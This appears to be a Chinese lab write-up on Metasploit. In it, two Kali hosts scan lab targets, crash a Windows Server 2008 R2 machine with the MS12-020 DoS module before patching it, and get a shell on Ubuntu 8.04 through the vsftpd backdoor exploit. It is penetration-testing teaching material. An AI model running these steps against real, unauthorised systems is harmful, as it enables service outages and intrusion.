目录

一、实验

1.环境

2.登录MSF(Metasploit Framework)控制台

3.MSF初始化

4.MSF 管理工作区

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

7.Kali Linux (2024.1) 对Windows server 进行DOS 

8.Windows server 安装补丁

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

二、问题

1.MSF常用模块与基础命令


一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2024.1

192.168.204.146(动态)

192.168.204.100(静态)

Windows server2008 R2192.168.204.150Kali(2024.1)的目标主机
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2024.1)系统版本

cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

ip addr

(4) 查看Windows server 2008 IP 地址

ipconfig

 (5)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2.登录MSF(Metasploit Framework)控制台

(1)Kali Linux (2024.1)系统版本

msfconsole

启动

进入并退出

(2)Kali Linux (2022.4)系统版本

msfconsole

启动

进入并退出

3.MSF初始化

(1)Kali Linux (2024.1)系统版本

初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

(2)Kali Linux (2022.4)系统版本

 初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

4.MSF 管理工作区

(1)Kali Linux (2024.1)系统版本

 查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  cicd

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  cicd

扫描Windows server数据

db_nmap 192.168.204.150

(2)Kali Linux (2022.4)系统版本

查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  devops

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  devops

 扫描Ubuntu数据

db_nmap 192.168.204.143

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

(1) 搜索 dir_scan 脚本

search dir_scan 

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.150

(4)运⾏脚本

run 

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

 (1) 搜索 dir_scan 脚本

search dir_scan 

 (2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

 7.Kali Linux (2024.1) 对Windows server 进行DOS 

(1) 搜索 dir_scan 脚本

search ms12-020

(2) 使⽤编号为 1 的脚本

use 1

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run 

查看Windows server状态

8.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

ms12-020

(3)安装补丁

重启

 (4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run 

(5)Windows server

保持正常

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

(1) 查看目标主机

先返回

back

目标主机为192.168.204.143

db_nmap -sP 192.168.204.0/24

扫描开放端口

db_nmap -sV 192.168.204.143

21端口已打开

 (2) 搜索 vsftpd 脚本

search vsftpd

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

//查看当前目录
pwd

//查看当前用户
whoami

//查看端口
netstat -antlp | grep 80

//查看进程
ps -elf | grep sshd

退出

exit

二、问题

1.MSF常用模块与基础命令

(1)模块

1)Auxiliary 辅助
⼀般负责执⾏扫描、嗅探、指纹识别、爆破等相关功能以辅助攻击,不直接在测试机和⽬标机之间建立访问。

2)Exploit 漏洞利⽤
利⽤发现的安全漏洞或配置弱点对远程⽬标进⾏攻击,以植入和运⾏攻击载荷。

3)Payloads 载荷
⽬标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透⽬标后,⽤于在⽬标系统上运⾏任意命令或者执⾏特定代码。

4)Post 后渗透
在取得⽬标的远程控制权以后,可以进⼀步实施的攻击动作,如获取敏感信息、实施跳板攻击等。

(2)命令

?            //获取帮助
? show       //查看show指令的帮助
search       //搜索模块
use          //使⽤模块
set          //设置模块选项
run          //运⾏当前模块
options      //列出当前模块的选项
show         //查看模块或相关信息
back         //返回上⼀步
exit/quit    //退出

Logo

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐